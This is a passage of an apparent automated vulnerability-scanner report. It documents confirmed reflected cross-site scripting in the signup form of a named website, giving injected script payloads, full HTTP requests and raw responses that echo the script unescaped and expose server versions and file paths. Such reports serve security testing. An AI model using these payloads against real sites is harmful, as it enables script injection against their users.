sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" N..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST '"--></style></script><script>alert(0x002A81)</script>
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
submit POST DONE ...Give me my site!
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 361
Accept-Encoding: gzip, deflate

firstN='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002A81)%3c%2fscript%3e&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&submit=DONE+...Give+me+my+site!&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:51:29 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><br><b>Warning</b>: OpenDir: No such file or directory (errno 2) in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1102</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1103</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1111</b><br><br><b>Warning</b>: Missing argument 1 for joinpage() in <b>/home/glnorg/public_html/002_Website.php3</b> on line <b>84</b><br><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b><font color="#FF0000">Oops! ...<br>Please check the following (red) entries*</font></b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1"></font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="\'\"--></style></script><script>netsparker(0x002A81)</script>"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000"><b>*USER ID !!</b></font></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"><br/><font color=blue size=2>*The USER ID NAME &quot;<font color=red><b>3</b></font>&quot; is already in use! Try adding a number or two... (before and/or after &quot;<font color=red><b>3</b></font>&quot;)...Or try using the first part of your email address (before the @ symbol)</font></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial,..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST '"--></style></script><script>alert(0x002A8E)</script>
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN=3&lastN='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002A8E)%3c%2fscript%3e&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:52:33 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="\'\"--></style></script><script>netsparker(0x002A8E)</script>"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> 